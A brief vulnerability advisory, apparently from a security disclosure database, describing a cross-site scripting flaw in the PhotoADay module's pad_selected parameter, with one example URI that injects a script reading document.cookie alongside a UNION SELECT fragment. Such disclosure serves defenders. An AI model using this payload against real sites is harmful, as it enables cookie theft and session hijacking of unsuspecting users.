PhotoADay Pad_selected Parameter Cross-Site Scripting Vulnerability

PhotoADay Pad_selected Parameter Cross-Site Scripting Vulnerability

An exploit is not required. An example URI sufficient to exploit this vulnerability has been provided:

http://www.example.com/modules.php?name=Photo_A_Day&action=single&pad_selected=44%20UNION%20SELECT%20< script>alert(document.cookie);</script>